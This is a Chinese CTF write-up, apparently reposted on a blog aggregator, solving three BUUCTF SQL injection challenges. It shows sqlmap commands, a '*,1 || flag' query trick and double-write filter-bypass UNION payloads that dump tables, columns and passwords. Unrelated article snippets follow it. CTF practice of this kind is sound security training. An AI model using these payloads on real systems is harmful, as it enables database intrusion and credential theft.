buuctf sql注入類練習

  • BUU SQL COURSE 1

  • 1

  • 實例無法訪問 / Instance can't be reached at that time | BUUCTF
  • 但是這個地方很迷惑就是這個 一個 # 我們不抓包就不知道這個是sql注入類的
  • 判斷是 get 類型的sql注入直接使用sqlmap
  • 我們放入到1.txt中

  • 目的是 優先檢測 ?id=1
  • >python3 sqlmap.py -r 1.txt
  • 他會自動的進行檢測 對方的數據庫類型

  • 直接進行數據搜哈

  • 這個加密是 24英文字母小寫是MD5

  • 解密不出來 那就說明這個pass就是密碼

  • flag{19a949af-93af-4422-a127-87b23a68c134}
  • [SUCTF 2019]EasySQL1

  • 老辦法復制一下然后 放到1.txt(這個文件需要和sqlmap是同級的文件)
  • 標上 *

  • 發現梭哈失敗了 原因 :1、這個過程中經過了 服務器的解密
  • 2、有waf
  • 第一種排除了 是第二種 有waf過濾

  • 輸入字母就會無回顯但是輸入數字

  • 有個Array 這個在php中是數組的意思
  • 也就是我們可以輸入一個數組 這個[0] 猜測是 $flag=array[xxxxxxxx]
  • 輸入1
  • 會出現 [0]=1
  • 但是輸入 0時會消失
  • 輸入0和1 發現我們輸入什么他就會回顯什么

  • 猜測后端的邏輯
  • 我發現一個規律就是 我輸入多少個數組 最后一個都是 1

  • 后端邏輯 : select $_POST['query'] || flag from Flag
  • 可能就是當我們輸入這個flag是正確的時候就會出現flag 這個很明顯不顯示
  • 但是我們可以使用 * 讓其列出所以的列 然后 ,1 構造這個數組
  • select *,1 || flag from Flag
  • 1 || flag
  • 就是作用類似于 1 or 1 =1
  • select * 是查找所以的值
  • 在mysql中 || 就是或運算符的意思
  • 1 or 一個值的邏輯必然是 true
  • 因為1是真實存在的
  • 但是如果我們輸入的flag不是真實存在的就雞雞了 但是這個又過濾了字母 所以說這樣做事最正確的
  • [極客大挑戰 2019]BabySQL

  • 判斷類型

  • 使用邏輯注入 '= \ '=
  • 獲取當賬號密碼

  • 猜測是MD5

  • 失敗 那就說明 passwd就是這個
  • 但是這個不是 flag
  • 根據題目提示 bodysql 但是我們不知道是哪個地方的注入抓個包直接使用sqlmap一鍵梭哈一下
  • 發現失敗了
  • python3 sqlmap.py -r 1.txt --level=4
  • 說明可能又有waf

  • 這個雙寫過濾的邏輯就是 服務器的替換是只能不斷向前替換的 不能回頭 bbyy 他首先會把 by 換為 ' ' 只能他是不能回頭把 b y 進行替換

  • 發現這樣構造還是沒有 所以就使用手工注入 使用 union 看一下他到底有幾個列

  • 發現一共是有 3個數據的

  • 有個知識點就是 不能在url中使用 # 要使用 %23 不然會造成不識別
  • 查表
  • ?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

  • http://6304b807-b309-4f6c-8c46-58857e48ae51.node5.buuoj.cn:81/check.php?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_schema=database()%23

  • 發現這個有兩個id 應該不是的
  • 直接找密碼
  • ?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/901252.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/901252.shtml
英文地址,請注明出處:http://en.pswp.cn/news/901252.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

(即插即用模塊-特征處理部分) 三十二、(TGRS 2024) MDAF 多尺度雙表示對齊過濾器

文章目錄 1、Multiscale Dual-Representation Alignment Filter2、代碼實現 paper:SFFNet: A Wavelet-Based Spatial and Frequency Domain Fusion Network for Remote Sensing Segmentation Code:https://github.com/yysdck/SFFNet 1、Multiscale Dual-…

Python 中為什么 hash(-1) == hash(-2)?

推薦超級課程: 本地離線DeepSeek AI方案部署實戰教程【完全版】Docker快速入門到精通Kubernetes入門到大師通關課AWS云服務快速入門實戰目錄 讓我們從哪里開始?獲取源代碼!讓我們瀏覽一下這是正確/完整的答案嗎?結論前幾天在瀏覽 Reddit 時,我在 r/Python 上看到了這樣一個…

基于PySide6與pycatia的CATIA繪圖比例智能調節工具開發全解析

引言:工程圖紙自動化處理的技術革新 在機械設計領域,CATIA圖紙的比例調整是高頻且重復性極強的操作。傳統手動調整方式效率低下且易出錯。本文基于PySide6pycatia技術棧,提出一種支持智能比例匹配、實時視圖控制、異常自處理的圖紙批處理方案…

macos下 ragflow二次開發環境搭建

參考官網鏈接 https://ragflow.io/docs/dev/launch_ragflow_from_source虛擬環境 git clone https://github.com/infiniflow/ragflow.git cd ragflow/ # if not pipx, please install it at first pip3 install pipxpipx install uv uv sync --python 3.10 --all-extras 安裝 …

libva之ffavdemo分析

ffavdemo 代碼庫實現了一個基于FFmpeg和VAAPI的硬件加速視頻解碼與渲染框架,主要用于演示視頻解碼與渲染的完整硬件加速流程。支持多種渲染后端(X11、DRM、EGL),適應不同顯示環境。包含視頻處理過濾器,可進行格式轉換和…

JavaWeb 課堂筆記 —— 09 MySQL 概述 + DDL

本系列為筆者學習JavaWeb的課堂筆記,視頻資源為B站黑馬程序員出品的《黑馬程序員JavaWeb開發教程,實現javaweb企業開發全流程(涵蓋SpringMyBatisSpringMVCSpringBoot等)》,章節分布參考視頻教程,為同樣學習…

精品推薦 | 湖倉一體電商數據分析平臺實踐教程合集(視頻教程+設計文檔+完整項目代碼)

精品推薦,湖倉一體電商數據分析平臺實踐教程合集,包含視頻教程、設計文檔及完整項目代碼等資料,供大家學習。 1、項目背景介紹及項目架構 2、項目使用技術版本及組件搭建 3、項目數據種類與采集 4、實時業務統計指標分析一——ODS分層設計與數…

【人工智能】大語言模型多義詞解析技術揭秘——以“項目“歧義消解為例

今天田辛老師和小伙伴探討了一個有趣的多義詞問題, 在人工智能技術日新月異的今天,大語言模型(LLM)對自然語言的理解能力已經達到令人驚嘆的水平。大模型到底是如何去區分多義詞的? 比如:當用戶提到"…

【maxENT】最大熵模型(Maximum Entropy Model)R語言實現

文章目錄 一、相關package介紹1.1 dismo 包1.2 raster包1.3 常見問題與解決 二、代碼示例 🟢🟠先看:【maxENT】最大熵模型(Maximum Entropy Model)介紹與使用(maxENT軟件) ASCII文件太大&#…

哈希表-算法小結

哈希表 map set 數組 在C中,set 和 map 分別提供以下三種數據結構,其底層實現以及優劣如下表所示: 集合底層實現是否有序數值是否可以重復能否更改數值查詢效率增刪效率std::set紅黑樹有序否否O(log n)O(log n)std::multiset紅黑樹有序是否…

OpenCompass模型評估

OpenCompass面向大模型的開源方和使用者, 提供開源、高效、全面的大模型評測開放平臺。 一、OpenCompass文檔 1.基礎安裝 使用Conda準備 OpenCompass 運行環境: conda create --name opencompass python3.10 -y conda activate opencompass2. 安裝 Op…

博途 TIA Portal之1200做主站與有意思的板子做MODBUS_RTU通訊

做為博途的硬件,1200和1500本體都不具有串口通訊功能,只能使用擴展板或是通訊模塊完成。 其中1200使用CB1241或CM1241進行串口通訊,本文將使用CM1241進行演示。 1、硬件介紹 1200的PLC一臺,有意思的板子(以下簡單4D板)一臺。 其中1200帶擴展模塊CM1241 RS232;4D板使…

【深度學習與實戰】3.1 邏輯回歸模型

?1. 定義與核心思想? 邏輯回歸(Logistic Regression)是一種用于?二分類問題?的統計學習方法,通過?sigmoid函數?將線性回歸的輸出映射到[0,1]區間,表示樣本屬于某一類別的概率?。 ?本質?:廣義線性模型&#x…

AI三萬字論文生成效果——隨機森林在信用卡欺詐分析

以下內容全文由AI制作,有gemini和gpt模型配合一次性生成(即未來我們會發布的功能),一次性生成的三萬多字論文效果。 標題:隨機森林在信用卡欺詐分析中的應用研究 摘要 信用卡欺詐已成為全球金融領域面臨的嚴峻挑戰…

質檢LIMS系統在半導體制造行業的應用 半導體質量革命的現狀

在半導體這個“工業皇冠上的明珠”領域,納米級的精度要求與質量管控如同硬幣的兩面。隨著芯片制程向3nm、2nm演進,傳統質檢模式已難以滿足海量數據、復雜工藝的質量追溯需求。質檢LIMS實驗室系統作為質量管理的中樞神經,正在重構半導體制造的…

idea手動創建resources文件夾

有時maven沒有構建成功可能造成,resources文件夾不創建的現象 此時我們可以手動創建 手動創建

利用Ruby的Typhoeus編寫爬蟲程序

Typhoeus是一個基于libcurl的HTTP客戶端,支持并行請求,適合高效爬取數據。用戶可能想要一個簡單的例子,或者需要處理更復雜的情況,比如分頁、并發請求或者數據解析。 首先,我應該檢查用戶是否已經安裝了Typhoeus。通常…

【mllm】——x64模擬htp的后端無法編譯debug

mllm, qnn, x64 code:https://github.com/UbiquitousLearning/mllm 1. 問題 通過自定義qualcomm graph使用高通的htp后端進行llm推理,網絡暫時只有mllm,和https://github.com/chraac/llama.cpp。qualcomm是支持x64模擬htp推理的,這樣比較好d…

JDK(Java Development Kit)從發布至今所有主要版本 的詳細差異、新增特性及關鍵更新的總結,按時間順序排列

以下是 JDK(Java Development Kit)從發布至今所有主要版本 的詳細差異、新增特性及關鍵更新的總結,按時間順序排列: 1. JDK 1.0 (1996) 發布年份:1996年1月23日關鍵特性: Java首次正式發布。核心語言特性…

撰寫學位論文Word圖表目錄的自動生成

第一步:為圖片和表格添加題注 選中圖片或表格 右鍵點擊需要編號的圖片或表格,選擇 【插入題注】(或通過菜單欄 引用 → 插入題注)。 設置題注標簽 在彈窗中選擇 標簽(如默認有“圖”“表”,若無需自定義標…